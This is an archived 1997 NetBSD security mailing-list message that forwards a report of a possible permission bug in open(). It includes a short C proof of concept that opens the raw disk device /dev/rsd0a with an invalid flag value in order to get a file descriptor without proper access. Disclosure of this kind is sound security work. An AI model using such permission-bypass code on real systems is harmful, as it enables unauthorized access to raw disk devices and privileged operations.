Subject: BoS: Possible SERIOUS bug in open()? (fwd)
To: Michael Graff <explorer@flame.org>
From: Andrew Brown <codewarrior@daemon.org>
List: tech-security
Date: 10/28/1997 16:17:46
i believe this is the original post in its (more or less) entirety...

>> From: explorer@flame.org
>From best-of-security-request@cyber.com.au  Wed Oct 22 18:00:23 1997
>X-List: from best-of-security-request@cyber.com.au to <best-of-security@lists.graffiti.com> via plum.cyber.com.au
>Resent-Date: Thu, 23 Oct 1997 08:00:11 +1000 (EST)
>Date: 17 Oct 1997 10:42:13 -0000
>Message-ID: <19971017104213.11040.qmail@kechara.flame.org>
>From: explorer@flame.org
>Sender: darrenr@cyber.com.au
>Old-Status: O
>Old-X-Originally-To: To: developers@NetBSD.ORG
>Old-X-Originated-From: From: explorer@flame.org
>Resent-Message-ID: <"4heHGD.A.NVC.gSjT0"@plum>
>X-Loop: best-of-security@cyber.com.au
>Errors-To: best-of-security-request@cyber.com.au
>Precedence: list
>Resent-Sender: best-of-security-request@cyber.com.au
>To: best-of-security@cyber.com.au
>Resent-From: best-of-security@cyber.com.au
>X-Mailing-List: <best-of-security@cyber.com.au> ftp://ftp.cyber.com.au/pub/archive/b-o-s/
>X-Subscription: To unsubscribe from this fine mailing list mail best-of-security-request@cyber.com.au with Subject: unsubscribe
>Subject: BoS: Possible SERIOUS bug in open()?
>
>
>This was sent to me recently...  It seems to be a pretty serious hole
>in open() and permissions...
>
>Note, in the following, open() succeeds, and ioctls are probably
>executed...
>
>/*
> * This will give you a file descriptor on a device you should not have
> * access to.  This seems really, really screwed up, since holding a fd
> * lets you do a lot of ioctls that you should not be able to do...
> */
>#include <fcntl.h>
>#include <stdio.h>
>#include <unistd.h>
>#include <err.h>
>
>int
>main(int argc, char **argv)
>{
>  int fd;
>
>  fd = open("/dev/rsd0a", -1, 0);
>
>  if (fd < 0)
>    err(1, "open");
>}
>
>


-- 
|-----< "CODE WARRIOR" >-----|
andrew@echonyc.com (TheMan)        * "ah!  i see you have the internet
codewarrior@daemon.org                               that goes *ping*!"
warfare@graffiti.com      * "information is power -- share the wealth."